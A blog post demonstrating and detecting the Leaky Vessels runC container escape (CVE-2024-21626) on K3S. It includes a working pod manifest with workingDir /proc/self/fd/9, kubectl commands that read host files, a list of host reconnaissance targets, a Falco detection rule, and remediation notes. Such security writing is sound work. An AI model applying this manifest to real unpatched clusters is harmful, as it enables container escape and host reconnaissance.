Discussion about the Leaky Vessels security vulnerability on K3S
Category: security
Modified: Fri, 2024-Feb-09
Introduction
Recently, there is a container security vulnerability called Leaky Vessels (CVE-2024-21626) that could lead to container escaping. With this vulnerability, processes running inside the container may have access to the files on the host system. Several CVEs are related and affects runC, Docker and BuildKits (CVE-2024-21626, CVE-2024-23651, CVE-2024-23652 and CVE-2024-23653). This article focused on CVE-2024-21626, which affects the runC container runtime.
This vulnerability is caused by file descriptor leak in the runC container runtime. With specific conditions or exploit, attackers can leverage this vulnerability to gain read access on the host system or even overwrite files on the host file system (I think it may depend on whether root is used to run the container).
When I heard about this vulnerability, most articles demonstrated on how to exploit it on Docker systems (by creating and running a malicious container image). I tried another method to see if the vulnerability works on K3S. This is the first time that I saw container escaping vulnerability in real life.
Unpatched version of K3S is affected
K3S uses containerd, which uses the runC runtime. Instead of creating a malicious container image, I tried to set 'workDir' of a pod definition to override the working directory. Below is an example:
---
apiVersion: v1
kind: Pod
metadata:
name: leaky-vessels
spec:
containers:
- name: leaky-vessels
image: docker.io/library/alpine:3.19
workingDir: /proc/self/fd/9
command: ["/bin/sh", "-c", "sleep infinity"]
privileged: false
securityContext:
allowPrivilegeEscalation: false
capabilities:
drop:
- ALL
privileged: false
runAsNonRoot: true
runAsUser: 1000000000
runAsGroup: 1000000000
seccompProfile:
type: RuntimeDefault
Here, several security measures are enabled for the container system. For example, it is not allowed to run the pod as root. The pod is not allowed to have privilege escalation. The pod is dropping all the Linux capabilities. The pod has also set the seccomp profile. All these measures cannot prevent the Leaky Vessels attack on a vulnerable system.
Next, we did not create a malicious container image and then trick the owner to run the container image. We just override the working directory of the pod to '/proc/self/fd/9'. Depending on the runC versions, it is said the 'working directory' needs needs to set to 'proc/self/fd/n', where n is between 1 to 10.
When the pod is run, we login inside the pod:
$ kubectl exec -it pod/leaky-vessels -- /bin/sh
$ pwd
# This is container escaping
# We now have read access to the files on the host of the K3S system
$ ../../../etc
$ ls -l hostname
-rw-r--r-- 1 root root 17 Nov 11 2019 hostname
$ cat hostname
k3s-controller.internal
Voila! Here we had it. Once the attacker escaped the container, even without write access, the attacker can do lots of things. The attacker could:
-
Read any files that is readable by the others group owner, including and not limited to:
-
Get the current hostname of the host server
-
Get the OS, Linux distribution of the host server (etc/redhat-release)
-
Get the DNS resolver of the host server
-
Access to the RPM database of the host server (e.g. strings rpmdb.sqlite | grep src.rpm | sort)
-
Then the attacks would know what packages is installed on the host
-
-
Access to proc/route, then the attackers would know the default gateway of the host
-
Access to proc/version, then the attackers would know the kernel version and architecture of the host
-
Access to proc/PID/stat, then the attackers would know some of the PID and process names that the host is running, For example:
ls -1 */stat | xargs awk '{print $1 " " $2}' | sort -n -k 1
# These are PIDs and the process name 33907 (nginx) 33908 (nginx) 33909 (nginx) 33910 (nginx) 33911 (nginx)
Many of the process names of the host system are exposed.
-
Below is a demostration about the Leaky Vessels attack.
Detecting the Leaky Vessels vulnerability
Snyk releases some eBPF (static and dynamic) detectors:
However, it seems these detectors are designed for runC (Docker based) systems. It is not working for K3S in my testing.
We can use Falco to detect the vulnerability.
Here is the Falco rule (/etc/falco/rules.d/leaky-vessels.yaml) I used for this case:
---
- rule: Possible container escape attempt - Leaky Vessels
desc: >
Detecting a container procss that changes the current directory using a procfs file descriptor.
condition: >
( container
and evt.type = chdir
and evt.dir = <
and evt.rawres in (0, 1, 2)
and evt.arg.path startswith "/proc/self/fd/" )
output: >
- Event time [%evt.datetime]
- Possible container escape attempt detected.
- Details
evt.type=%evt.type
evt.args=%evt.args
evt.res=%evt.res
proc.pid=%proc.pid proc.cwd=%proc.cwd
proc.cmdline=%proc.cmdline proc.exepath=%proc.exepath
proc.sid=%proc.sid
proc.ppid=%proc.ppid proc.pcmdline=%proc.pcmdline
proc.vpid=%proc.vpid
user.uid=%user.uid user.name=%user.name
user.loginuid=%user.loginuid user.loginname=%user.loginname
group.gid=%group.gid group.name=%group.name
container.privileged=%container.privileged
container.id=%container.id
container.name=%container.name
container.image=%container.image
container.image.id=%container.image.id
container_location=%container.image.repository:%container.image
container.image.digest=%container.image.digest
k8s.pod.name=%k8s.pod.name
priority: WARNING
tags: [host, container, cve-2024-21626]
Below log is logged to syslog in a single line. For it to be easier to view, I split them up to multiple lines.
Feb 7 09:22:09 k3s-controller falco[1157671]: 09:22:09.819887134:
Warning - Event time [2024-02-07 09:22:09.819887134]
- Possible container escape attempt detected.
- Details evt.type=chdir evt.args=res=0 path=/proc/self/fd/9
evt.res=SUCCESS proc.pid=1158172
proc.cwd=/proc/self/fd/9/ proc.cmdline=runc:[1:CHILD] init
proc.exepath=/data/container/rancher/k3s/data/3dfc950bd39d2e2b435291ab8c1333aa6051fcaf46325aee898819f3b99d4b21/bin/runc
proc.sid=99 proc.ppid=1158164
proc.pcmdline=runc --root /run/containerd/runc/k8s.io --log /run/k3s/containerd/io.containerd.runtime.v2.task/k8s.io/babba8c496a041fcc8ba8227f4aca026674d2ba30b5d52d19a0fff86e476304b/log.json --log-format json exec --process /tmp/runc-process1490844986 --console-socket /tmp/pty3871979753/pty.sock --detach --pid-file /run/k3s/containerd/io.containerd.runtime.v2.task/k8s.io/babba8c496a041fcc8ba8227f4aca026674d2ba30b5d52d19a0fff86e476304b/fcbbe128159780ff084f695701c87b38638eada0c896bfc75304a779df3ed5be.pid babba8c496a041fcc8ba8227f4aca026674d2ba30b5d52d19a0fff86e476304b
proc.vpid=99
user.uid=0 user.name=root user.loginuid=-1 user.loginname=<NA>
group.gid=0 group.name=root
container.privileged=<NA> container.id= container.name=<NA> container.image=<NA>
container.image.id=<NA> container_location=<NA>:<NA>
container.image.digest=<NA> k8s.pod.name=<NA>
Remediation and prevention
-
One should check with vendors and upgrade the vulnerable systems to the patched version (e.g., runc, Docker, BuildKit, containerd, K3S, OpenShift, cloud service providers and etc.)
-
According to previous readings and articles, RedHat recommended users to configure SELinux in enforcing mode so that these suspicious activities could be blocked
-
Container sandboxing with Google gVisor I tried using the same method (setting workDir) on a older version of Google gVisor and Kata Containers on an unpatched K3S. The 'workDir' method does not work under container sandboxing. These sand boxing techniques provide an isolated environment and reduced the attack surface.
-
Result with Google gVisor
$ kubectl describe pod/leaky-vessels Name: leaky-vessels Containers: leaky-vessels: Container ID: containerd://d9331918bb000afb1000f3065e72295a92abdd70b885c53de404f9025ad6c20a Image: docker.io/library/alpine:3.19 Command: /bin/sh -c sleep infinity State: Waiting Reason: CrashLoopBackOff Last State: Terminated Reason: StartError Message: failed to start containerd task "d9331918bb000afb1000f3065e72295a92abdd70b885c53de404f9025ad6c20a": OCI runtime start failed: starting container: starting sub-container [/bin/sh -c sleep infinity]: creating process: failed to find initial working directory "/proc/self/fd/9": invalid argument: unknown Exit Code: 128 Ready: False
-
Result with Kata Containers
Name: leaky-vessels Containers: leaky-vessels: Container ID: containerd://b03df3a00fd9856d5f36bac3f346aba8451bd7814e8538d691da58d851c5b650 Image: docker.io/library/alpine:3.19 Port: <none> Host Port: <none> Command: /bin/sh -c sleep infinity State: Waiting Reason: RunContainerError Last State: Terminated Reason: StartError Message: failed to create containerd task: failed to create shim task: No such file or directory (os error 2): unknown Exit Code: 128 Ready: False
-
Comments
No. of comments: 0
Please read and agree the privacy policy before using the comment system.